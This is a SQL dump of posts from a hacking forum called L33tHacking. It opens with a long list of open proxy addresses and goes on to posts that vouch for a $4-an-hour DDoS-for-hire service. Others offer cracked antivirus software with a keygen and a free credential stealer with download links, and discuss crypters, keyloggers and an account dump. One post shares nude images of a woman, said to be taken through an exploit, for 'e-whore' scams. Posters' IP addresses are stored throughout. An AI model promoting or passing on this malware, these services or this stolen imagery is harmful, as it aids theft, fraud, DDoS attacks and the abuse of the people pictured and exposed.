115.25.216.6:80 58.24.198.177:6668 222.43.60.178:8080 222.166.104.49:6666 201.0.175.60:80 125.77.127.143:6675 124.127.126.201:6668 122.242.23.206:6668 122.225.17.202:808 119.32.229.40:8909 75.73.103.45:8118 46.29.23.213:80 116.228.205.214:80 218.71.121.9:6668 125.75.144.9:6668 116.255.214.229:3128 116.28.65.249:80 119.186.116.225:6668 116.66.203.44:80 116.66.203.44:8080 119.162.41.72:6668 116.9.66.147:8909 113.106.103.228:80 110.152.89.155:6675 46.181.11.99:54321 221.11.8.90:8080 117.21.190.50:8090 61.18.164.109:9415 196.45.48.16:808 125.46.151.187:6668 211.167.112.14:82 117.87.57.201:6666 211.167.112.14:80 124.244.214.195:3128 119.18.178.75:54321 114.255.193.231:8080 86.12.154.1:80 213.109.84.73:54321 87.106.246.207:8118 118.145.11.230:80 67.55.115.76:8080 118.145.11.232:80 221.6.15.158:80 183.230.2.6:1337 60.194.251.161:6675 1.85.17.250:8090 82.223.130.77:80 69.163.96.22:8080 86.12.154.38:80 110.88.209.66:6675 60.190.189.214:8123 113.106.103.224:80 200.239.66.22:80 173.217.249.99:8123 216.17.106.16:8080 221.207.59.234:8090 98.211.165.194:8085 200.222.105.124:8080 221.10.159.234:1337 88.131.82.241:3128 88.198.64.141:8118 222.197.172.77:808 222.197.160.66:808 89.237.135.3:80 78.47.224.157:80 61.59.159.187:80 61.164.160.30:1080 58.242.21.114:6666 50.7.10.38:3128 50.7.10.37:8080 50.7.10.37:3128 50.7.10.36:8080 50.7.10.36:3128 50.7.10.34:8080 50.7.10.34:3128 222.95.181.205:6675 221.174.234.18:6668 212.101.225.93:3129 212.101.225.93:80 208.67.253.172:80 182.255.0.34:3129 180.126.12.103:6668 123.108.97.75:3636 115.236.61.116:1080 111.226.165.234:6668 110.188.97.7:6668 109.171.1.235:3128 193.239.220.148:443 71.88.103.125:8085 122.81.248.198:1337 209.144.20.18:80 190.9.128.234:80 24.192.165.67:36081 94.23.250.210:80 193.239.220.148:80 195.64.211.173:3128 91.151.52.7:80 68.53.82.151:8085 113.12.71.114:1337 58.246.124.78:6668 27.120.81.191:3128 222.243.158.227:8123 221.195.46.169:6675 221.195.46.169:6666 219.153.70.174:8090 193.147.86.249:3128 187.115.25.79:443 123.148.130.66:6675 113.106.99.203:9000 41.205.230.190:8080 202.115.11.179:808 117.12.245.10:6675 119.226.108.30:8080 113.252.242.195:6666 113.106.99.209:9000 113.106.99.207:9000 96.9.137.12:80 94.231.164.133:3128 91.207.73.83:81 125.39.93.69:8888 119.4.250.97:80 222.255.134.76:3128 124.205.165.226:8080 66.203.202.83:80 78.85.35.222:6588 119.7.45.50:6668 222.83.208.31:6668 222.247.50.15:80 222.136.37.226:6675 221.207.43.98:6668 184.106.182.209:80 120.132.133.174:80 177.69.236.242:80 120.199.55.214:8089 120.32.230.158:6668 180.112.199.116:6666 123.11.116.50:6675 113.134.234.127:6675 113.106.99.211:9000 111.221.40.229:80 175.41.194.124:80 121.22.48.194:80 67.55.121.218:8118 67.55.121.215:8118 60.12.193.43:8090 211.147.213.112:80 122.141.243.216:80 208.67.253.170:80 115.236.73.178:8090 112.65.171.122:8080 220.194.47.221:8080 46.164.140.38:3128 212.34.181.124:3128 122.225.242.139:1337 209.62.12.130:8118 94.56.135.121:80 222.197.188.39:8080 60.6.238.66:1337 37.59.36.48:8080 113.59.34.17:8090 94.137.247.36:3128 221.181.72.156:4000 78.63.208.158:54321 95.65.46.71:54321 218.108.168.164:80 218.108.168.135:80 203.110.178.231:80 202.69.107.114:3128 219.129.199.78:6668 118.72.64.10:6675 222.222.194.99:8090 222.87.110.19:6668 112.115.60.107:6668 221.6.15.158:82 221.6.15.157:82 60.180.3.142:6668 210.76.123.36:80 86.51.159.162:8080 67.55.121.212:8118 93.157.103.243:80 219.217.227.79:80 198.100.157.30:8080 178.18.17.208:8080 206.17.82.114:80 180.117.235.94:6666 61.185.87.105:80 60.12.193.42:8090 59.53.92.3:8090 41.76.222.29:80 96.4.120.47:80 98.226.61.234:36081 94.23.44.132:3128 94.23.25.46:80 94.183.71.121:8080 178.18.17.208:3128 84.241.44.251:8080 199.119.76.22:8080 177.71.227.30:80 199.96.86.158:8080 199.96.86.158:3128 202.116.161.11:808 200.143.132.98:80 202.120.88.12:8080 202.117.56.114:808 94.143.43.224:3128 123.129.214.155:80 123.138.16.82:8080 202.131.237.134:808 123.139.155.106:80 123.139.155.107:80 80.91.168.126:3128 61.152.176.48:80 91.185.26.131:3128 84.241.35.6:3128 61.177.252.38:8080 61.172.203.212:8080 5.9.229.146:808 77.37.192.19:3128 189.73.195.178:3128 221.2.226.12:8080 217.113.5.196:3128 194.190.33.234:3128 211.232.93.13:808 124.240.187.80:80 124.248.211.78:80 177.71.255.202:80 175.184.33.132:80 125.37.60.100:8909 193.93.23.68:80 175.184.34.77:80 125.110.152.136:6668 125.116.198.146:8080 125.125.47.58:6668 113.106.99.246:9000 125.19.133.254:8080 125.216.144.199:8080 113.106.99.245:9000 113.106.99.202:9000 95.31.18.119:3128 94.23.39.54:3128 88.85.251.178:8080 61.135.164.220:80 61.178.78.163:808 61.163.78.51:3128 46.181.19.56:3128 125.39.93.68:8888 178.254.148.56:80 198.100.157.30:3128 23.20.161.66:80 125.75.160.29:6668 217.76.35.238:3128 125.93.47.161:6666 211.67.81.37:808 14.139.120.124:6588 201.217.57.108:80 115.178.121.122:80 46.39.225.33:3128 146.164.122.178:80 216.244.71.93:8087 216.17.106.16:3128 210.22.13.104:80 149.255.102.118:3128 153.19.95.1:80 190.9.128.96:80 162.105.11.161:808 93.166.121.107:8118 66.146.193.31:8118 163.30.162.1:80 164.77.196.75:80 115.85.67.88:3128 202.150.166.218:8080 211.154.83.37:80 95.181.108.17:54321 173.213.108.111:3128 173.213.108.111:8080 173.213.108.112:3128 173.213.108.112:8080 173.213.108.113:3128 173.213.108.113:8080 173.213.108.114:3128 173.213.108.114:8080 200.124.130.140:808 61.7.31.90:54321 123.71.238.107:6675 81.208.47.117:6588 190.92.61.18:8080 123.139.155.103:80 123.139.155.103:82 122.193.31.69:3128 173.224.120.70:8118 111.223.88.141:8080 85.185.45.1:80 175.41.218.110:80 175.41.226.229:80 222.80.72.30:1337 176.36.151.85:443 218.108.242.124:8080 59.53.92.7:8090 218.241.153.43:8080 60.12.177.109:8080 69.163.96.25:8080 218.108.168.164:82 61.135.209.203:81 109.86.201.180:54321 218.108.168.135:82 219.72.228.2:80 217.24.114.114:3128 58.53.192.218:8123 211.154.83.38:82 211.154.83.38:80 211.154.83.35:82 211.154.83.35:80 211.138.123.60:80 202.98.11.116:80 58.22.151.6:80 202.75.217.156:80 198.100.153.111:8600 195.138.81.100:3128 62.45.42.24:80 49.212.174.24:80 180.246.28.41:80 41.86.96.111:8080 199.119.76.22:3128 37.59.157.153:808 125.117.11.130:6675 177.70.9.79:80 123.139.155.104:80 118.102.27.216:8080 23.22.226.194:80 202.121.129.204:8080 222.221.27.13:8080 80.63.56.146:8118 222.197.190.51:808 60.191.124.58:3128 46.49.81.17:3128 222.162.177.225:6675 218.62.97.105:808 221.7.43.71:1337 221.6.154.73:8080 183.63.94.13:8080 202.150.166.218:80 202.142.17.120:80 125.76.237.68:80 174.137.184.37:8080 173.10.134.173:8081 123.129.242.131:8081 122.170.3.229:3128 103.3.221.154:8080 96.44.168.147:443 221.6.15.156:80 94.228.226.200:8080 93.189.216.77:3128 93.78.214.219:3128 86.51.159.162:80 85.92.159.84:8080 85.185.45.9:80 85.185.45.3:80 85.185.45.19:80 85.185.45.16:80 85.185.45.14:80 85.185.45.13:80 85.185.45.12:80 219.75.27.11:80 78.189.194.214:8080 74.208.204.187:80 67.55.121.217:8118 61.55.173.55:8080 61.55.141.12:80 61.55.141.10:80 61.181.22.156:80 61.164.160.30:80 218.108.242.124:80 180.246.57.97:80 60.28.250.194:82 60.11.169.132:8080 59.188.19.197:8080 58.63.224.74:80 218.108.168.165:82 58.251.57.78:8001 218.108.168.138:80 5.39.37.139:808 5.152.195.199:808 49.212.192.166:3128 218.108.168.136:82 46.211.75.138:54321 218.108.168.130:82 218.108.168.130:80 202.198.17.141:8080 222.74.212.66:808 222.39.80.18:808 202.159.226.227:8080 217.196.164.61:3128 217.70.39.123:3128 202.55.5.245:8081 203.151.17.97:8080 221.6.15.156:82 216.66.72.137:8080 221.4.163.84:80 221.238.153.236:80 221.204.184.81:81 216.244.71.143:8080 219.224.27.141:808 219.223.252.165:80 219.142.225.87:8080 218.94.1.166:82 218.89.108.57:80 218.29.131.11:3128 216.226.190.155:8080 218.204.131.250:3128 218.108.242.107:3128 218.108.168.166:80 216.15.178.23:3128 218.108.168.165:80 218.108.168.138:82 212.33.245.235:3128 211.167.112.18:80 218.108.168.136:80 211.167.112.18:82 203.174.78.243:80 203.174.78.243:8081 211.167.112.15:82 203.98.145.234:80 203.201.161.73:3128 216.244.71.143:3128 210.184.6.231:80 216.226.190.155:80 216.15.178.23:8080 211.167.112.15:80 212.45.5.172:3128 211.157.104.100:80 211.154.83.37:82 210.51.17.73:80 210.14.70.21:81 210.22.151.78:80 211.144.76.7:8181 209.88.88.40:80 187.121.90.157:8080 [/code] Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '308b7bbed322523fe8ef2adf50bd79fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2833', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1348954751', 'Thanks. He took a random website for me. Vouch! http://i.imgur.com/CWBFc.png', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b10fc0ab32dac65c13213165a4b7b681', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2834', '581', '0', '15', '[CRACKED] Zemana AntiLogger 1.9.3.208 [WITH UPDATES]', '0', '203', 'NeonLights', '1348954819', '[align=center][img]http://3.bp.blogspot.com/-CC45-US0XCg/UEdDZHYrnZI/AAAAAAAAAqw/XcS6k_bZpMg/s400/e59b2decdeaf8669fe58a1449ab96341.jpg[/img] Zemana AntiLogger 1.9.3.208 | 9.1 Mb Anti-Logger, developed to deal with different kinds of malware threats, protects your banking passwords, private emails & chat conversations from spying proactively without needing a signature-based algorithm and includes powerful, anti-action methods.AntiLogger prevents all known forms of malwares which intend to carry out information theft. As AntiLogger uses a proactive and a unique way to detect potentially harmful applications which have not already been recognized or identified by any anti-virus programs consequently, it protects your \'Information Security\' from a range of threats.Modules: Anti-SSL Logger, Anti-WebCam Logger and Anti-ClipBoard Logger are the first security solutions developed in the world. Also, you will realize that these modules have the best features if compared to similar applications.Anti-KeyLogger Module provides a new powerful protection against keyloggers which have not been even caught by known, the most popular security softwares in the world. Here are some key features of \"Zemana AntiLogger\": · Anti-SSL Logger Module that provides protection against SSL Logger · Anti-WebCam Logger that provides protection against WebCam Logger · Anti-Key Logger Module that provides protection against Key Logger · Anti-Screen Logger that provides protection against Screen Logger · Anti-Clipboard Logger that provides protection against ClipBoard Logger · System Defence Module that protects your system How to use: -install zemina antilogger -run the keygen in the extra foler -copy the key and register it inside of zemina -boom u got 3 years of free usage :) [lock]download: http://adf.ly/382489/http://ge.tt/9r42UBN/v/0?c?c[/lock][/align]', '67.68.75.193', '1128549313', '1', '0', '1', '1352011584', '1', '777c05d8ad612d82c0c2cf10578bcaf0', '0', '1352011584'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2835', '582', '0', '15', 'RobotStealer Free Stealer', '0', '203', 'NeonLights', '1348954936', '[align=center][img]http://i.imgur.com/vk92Y.jpg[/img] It uses http (php) to upload the logs. That means you need a website to use this stealer, (Dropbox can\'t be used, since you need a htaccess file, to stop anyone from entering the upload folder. why did I use http instead of smtp or ftp: Because that way there\'s no stored login information in the binary compiled file, so even your stealer should be decompiled, you won\'t be able to get hacked. The output file is 4 kb. and it will download the stealer itself, and run it, then upload the logs to your site, that way I can always update it, and make it FUD, in case it should become detected download: http://adf.ly/382489/http://ge.tt/38y1EkN/v/2?c download 2: http://adf.ly/382489/http://www.mediafire.com/?c1a9521snzihuub[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '05f743cdfa72ce4dc96b3e67cf10f711', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2836', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348955080', 'I updated the link. L33THacking is there just no banner.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8633d55df655412fbc523c6a4c87b51b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2837', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '1', 't3h jok3r', '1348955658', 'Threw away with the food? I don\'t think it would work but there is a possibilty that it would.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9add3037713170f11f81075ca7b95cbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2838', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '1', 't3h jok3r', '1348956087', 'http://l33thacking.net/misc.php?action=help&hid=13 Your welcome! ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '016948a85e9e6ce7f31d1b4905b68fc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2839', '565', '2824', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '1', 't3h jok3r', '1348956607', '[quote=\'NeonLights\' pid=\'2824\' dateline=\'1348943126\'] [quote=\'GRONgamer61\' pid=\'2822\' dateline=\'1348941886\'] Oh, well in that case it may not be FUD, again I just got this from HF. [/quote] alright :) was just checking cuz ive used chrom before and there products arent the best but nice share anyways [/quote] Chrome crypter has two different versions. 1 is the public one which is not FUD and updated once in a while and 1 is a private one which is for sale and updated every month.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2fa328100151684ce6db2947e3c4a52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2840', '398', '2833', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348958198', '[quote=\'t3h jok3r\' pid=\'2833\' dateline=\'1348954751\'] Thanks. He took a random website for me. Vouch! http://i.imgur.com/CWBFc.png [/quote] Cool. Also, you got a Mac? Nice! Why did you bookmark EliteLobby? :p Also, might wanna censor some of your tabs/bookmarks? Etc. I see parts of your email.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3d2f6ef35b22b4300b9985d607350fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2841', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348958320', 'Thanks. Voted for L33tHacking.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2bdde7977bf6ee036a3c01712edbad81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2842', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '82', 'iTzIpod', '1348958373', 'That\'s just my method. It works where I live. So I decided to share it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '26bebeb1d121aeea1094fd88b2c69a1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2843', '515', '2841', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348960318', '[quote=\'iTzIpod\' pid=\'2841\' dateline=\'1348958320\'] Thanks. Voted for L33tHacking. [/quote] Thanks for the vote but only unique votes count.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c78d36f7454fec9020c8637a5ba67c18', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2844', '583', '0', '17', '500+ pictures of same girl E-Whore pack', '0', '82', 'iTzIpod', '1348960805', 'Got this from the UploadNSell Exploit. Girl is actually decent looking. :hurr: What is included: Over 500 images of a girl, nude and not. Good quality images, girl 7/10 in my book. Have fun with whatever you use this for! Preview [spoiler][img]http://desmond.imageshack.us/Himg805/scaled.php?server=805&filename=picture255u.jpg&res=landing[/img][/spoiler] 29.8 MB file, and there\'s not even AdFly, just a straight link to uppit :) enjoy! [url=http://uppit.com/bkv1qlu6m5n1/my_cam_pics.rar][color=#32CD32]ClickToDownload[/color][/url] [color=#FF0000][url=http://anubis.iseclab.org/?action=result&task_id=13aed453ac00bbca45190fd9498db73ca&format=html]VirusScan[/url][/color]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2f499f2a5f1dc06e006db96c87aca9f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2845', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '82', 'iTzIpod', '1348960839', 'I don\'t get what you mean on this? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9198d47f8d81218f6f4ed62cb714a99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2846', '584', '0', '24', 'Windows 8, will you switch over?', '0', '205', 'mothered', '1348960856', 'Greetings everyone, As the thread\'s title reads, will you make the switch over to Windows 8, or have you done so already? I have the RTM (Release to Manufacturer) version of Windows 8 Installed on 2 lappies, and love It. I\'ve heavily customized It via the Registry, added a Start menu, made It boot straight Into the desktop, added the Sidebar gadgets, and the list goes on. How about you guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fcac4b0c9865d10cebfd35a2b0f9ea3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2847', '576', '2828', '15', 'RE: The Ultimate HACK PACK', '0', '61', 'NXK', '1348961185', '[mod]Closed due to possible infections[/mod]', '99.253.94.204', '1677549260', '1', '0', '1', '1349235274', '1', '28521410ce2565e1b8a513a935451de7', '0', '1349235274'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2848', '585', '0', '24', 'Post your specs', '0', '205', 'mothered', '1348961210', 'Greetz everyone, Here\'s the specs of my lappy which I purchased not too long ago. It also has a 2GB GT540M dedicated V/C and 750GB H/D. Yeah, Windows 7 Home Premium Is not too flash, but who cares. It only misses a few features of the more superior editions. The ram Is certainly Impressive though. Screenie: [URL=http://imageshack.us/photo/my-images/204/myspecsz.png/][IMG]http://imageshack.us/a/img204/1623/myspecsz.png[/IMG][/URL] Let\'s see yours...', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '560b43b388f3508de805a0f22c45173b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2849', '586', '0', '5', 'Mod code', '0', '61', 'NXK', '1348961238', '[mod]Hi[/mod] Isn\'t working again!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '38105ed75f72f3706509d11008b23b2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2850', '526', '2637', '3', 'RE: New Smilies', '0', '205', 'mothered', '1348961340', 'I must say that I like them. They\'re certainly different, and beat the ones defaulted. Well done.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '085768eac4f0254bcff3f1b43bddd9ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2851', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1348961471', 'Yeah I saw that bookmark earlier I just took it off, I have NO idea how it got there xDD I don\'t even go on elite lobby. Also, that email is one of the ones I use for my Keylogger, so I don\'t care if people see it. [hr] Online and taking orders!', '98.216.185.125', '1658370429', '1', '0', '100', '1349025781', '1', '9750ae9711622f299dd745cd0fc70651', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2852', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '205', 'mothered', '1348961493', 'I\'m probably a lot older than most members here (still have the mentality of a teenager though!), so I\'m Into hard rock and heavy metal. Don\'t mind the occasional rap though.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4b4ea30fa2a515a1aff40c688743a3b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2853', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1348961784', 'Don\'t worry. I won\'t make fun of anyone hopefully on this forum. I got a friend that\'s about 21 or 22 and listens to those genres! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f23ad4af7de2289f753f8637312fe9a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2854', '587', '0', '65', 'Who likes the Rocky Films?', '0', '205', 'mothered', '1348961805', 'Greetings L33thacking, So who likes the Rocky films? I can watch them over and over again, and never get bored. Although I don\'t think much of Rocky V, I still don\'t mind watching It.... Also, which one\'s your favorite?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fdbb1f168bba965acaa65f3f92569110', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2855', '559', '2796', '3', 'RE: Upgrade Price Lowered', '0', '1', 't3h jok3r', '1348961845', '[quote=\'iTzIpod\' pid=\'2796\' dateline=\'1348920964\'] Nice update. You got a point. When L33tHacking becomes big, lets try making it $10 again. And then maybe $15. Upgrade Section is kinda dead right now. So it\'s not really worth it at the moment. Unless we gain a lot more active members that will post HQ stuff. [/quote] True, it\'s inactive but we sure do have a lot of great content and don\'t forget the privileges you get after upgrading ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a9322e1729e91a94ac05aaa63bed10ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2856', '526', '2850', '3', 'RE: New Smilies', '0', '1', 't3h jok3r', '1348961892', '[quote=\'mothered\' pid=\'2850\' dateline=\'1348961340\'] I must say that I like them. They\'re certainly different, and beat the ones defaulted. Well done. [/quote] True, they sure do beat the default ones plus the default ones have a white BG in black themes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'addb6b248402376cdf515da5f0ccd240', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2857', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '205', 'mothered', '1348962050', 'Let\'s get It to the 3k mark guys. Getting there...:)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1a98fff2bf1bdd0c3fba1c22ec7c5ff3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2858', '586', '2849', '5', 'RE: Mod code', '0', '1', 't3h jok3r', '1348962075', 'It\'s working to me, are you sure? [b]Edited[/b] The letter \"M\" should be capital in the mycode.', '72.231.24.165', '1223104677', '1', '0', '1', '1348962679', '1', 'f7fa0e79c54085690d6781edb415b9cd', '0', '1348962679'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2859', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '100', '??zg???g????61', '1348962120', 'Very HQ post thanks a ton bro!', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', '29507b91ea7b98e0cd3c89afe86a2dd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4170', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349904586', 'I know a guy that will crypt for $1', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '906d9a0241f7714cc7b715806da5fc51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, 